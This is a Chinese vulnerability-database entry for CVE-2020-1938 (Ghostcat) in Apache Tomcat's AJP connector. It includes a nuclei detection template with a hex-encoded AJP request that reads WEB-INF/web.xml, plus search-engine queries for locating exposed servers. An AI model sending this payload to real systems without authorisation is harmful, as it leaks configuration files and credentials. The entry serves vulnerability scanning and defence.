Apache Tomcat AJP File Read/Inclusion Vulnerability

漏洞信息

漏洞名称： Apache Tomcat AJP File Read/Inclusion Vulnerability

漏洞编号：

• CVE： CVE-2020-1938

• CNVD： CNVD-2020-10487

漏洞类型： 文件读取

漏洞等级： 严重

漏洞描述： Apache Tomcat是一个广泛使用的开源Web服务器和Servlet容器，支持Java Servlet和JavaServer Pages (JSP)技术，常用于企业级应用部署。由于其高性能和稳定性，Tomcat在互联网服务中占有重要地位。该漏洞，被称为Ghostcat，影响Apache Tomcat的AJP（Apache JServ Protocol）协议实现。AJP协议设计用于Tomcat与Web服务器（如Apache HTTP Server）之间的通信，以提高性能。然而，由于Tomcat默认启用了AJP连接器，并且对AJP连接的信任度高于HTTP连接，攻击者可以利用此漏洞读取或包含Web应用中的任意文件，甚至在某些条件下实现远程代码执行。漏洞的根本原因在于Tomcat对AJP请求的处理不当，未能充分验证和限制请求的内容，导致攻击者可以构造恶意请求访问受限资源。此漏洞的利用不需要认证，攻击者只需能够访问Tomcat的AJP端口即可发起攻击，对受影响系统构成严重威胁。成功利用此漏洞可能导致敏感信息泄露，如配置文件、源代码或凭证，进一步可能导致系统被完全控制。

产品厂商： Apache

产品名称： Apache Tomcat

影响版本： 9.0.0.M1 <= version <= 9.0.0.30, 8.5.0 <= version <= 8.5.50, 7.0.0 <= version <= 7.0.99

搜索语法： title=”apache tomcat”

来源： https://github.com/projectdiscovery/nuclei-templates/blob/64a64b0937e369fef2cb769b4e48757616ecce15/network%2Fcves%2F2020%2FCVE-2020-1938.yaml

类型： projectdiscovery/nuclei-templates:github issues

POC详情

id: CVE-2020-1938

info:
  name: Ghostcat - Apache Tomcat - AJP File Read/Inclusion Vulnerability
  author: milo2012, NaN@korelogic
  severity: critical
  description: When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed - returning arbitrary files from anywhere in the web application - processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations.
  impact: |
    This vulnerability can lead to unauthorized access to sensitive information, such as configuration files, source code, or credentials.
  remediation: https://access.redhat.com/solutions/4851251
  reference:
    - https://www.tenable.com/blog/cve-2020-1938-ghostcat-apache-tomcat-ajp-file-readinclusion-vulnerability-cnvd-2020-10487
    - https://nvd.nist.gov/vuln/detail/CVE-2020-1938
    - https://lists.apache.org/thread.html/r7c6f492fbd39af34a68681dbbba0468490ff1a97a1bd79c6a53610ef%40%3Cannounce.tomcat.apache.org%3E
    - https://lists.apache.org/thread.html/r75113652e46c4dee687236510649acfb70d2c63e074152049c3f399d@%3Cnotifications.ofbiz.apache.org%3E
    - http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00025.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-1938
    cwe-id: CWE-269
    epss-score: 0.94469
    epss-percentile: 0.99995
    cpe: cpe:2.3:a:apache:geode:1.12.0:*:*:*:*:*:*:*
  metadata:
    max-request: 4
    vendor: apache
    product: geode
    shodan-query:
      - title:"Apache Tomcat"
      - http.title:"apache tomcat"
    fofa-query: title="apache tomcat"
    google-query: intitle:"apache tomcat"
  tags: cve,cve2020,kev,tenable,apache,lfi,network,tomcat,ajp,tcp

tcp:
  - host:
      - "{{Hostname}}"
      - "{{Host}}:{{Port}}"
    inputs:
      - data: "{{hex_decode('1234020e02020008485454502f312e310000132f6578616d706c65732f78787878782e6a73700000093132372e302e302e3100ffff00093132372e302e302e31000050000009a006000a6b6565702d616c69766500000f4163636570742d4c616e677561676500000e656e2d55532c656e3b713d302e3500a00800013000000f4163636570742d456e636f64696e67000013677a69702c206465666c6174652c207364636800000d43616368652d436f6e74726f6c0000096d61782d6167653d3000a00e00444d6f7a696c6c612f352e3020285831313b204c696e7578207838365f36343b2072763a34362e3029204765636b6f2f32303130303130312046697265666f782f34362e30000019557067726164652d496e7365637572652d52657175657374730000013100a001004a746578742f68746d6c2c6170706c69636174696f6e2f7868746d6c2b786d6c2c6170706c69636174696f6e2f786d6c3b713d302e392c696d6167652f776562702c2a2f2a3b713d302e3800a00b00093132372e302e302e31000a00216a617661782e736572766c65742e696e636c7564652e726571756573745f7572690000012f000a001f6a617661782e736572766c65742e696e636c7564652e706174685f696e666f0000102f5745422d494e462f7765622e786d6c000a00226a617661782e736572766c65742e696e636c7564652e736572766c65745f706174680000012f00ff')}}"
    read-size: 1024
    matchers:
      - type: word
        words:
          - "See the NOTICE file distributed with"
# digest: 4a0a0047304502205ae5556991b044128ba5f41d0fdf612bc9477bc4334c3be2b8c71b519a613fd2022100e11b38470d922b9810e9bc318e4d6ebe2fa33974b298365f110a02545d7e153b:922c64590222798bb761d5b6d8e72950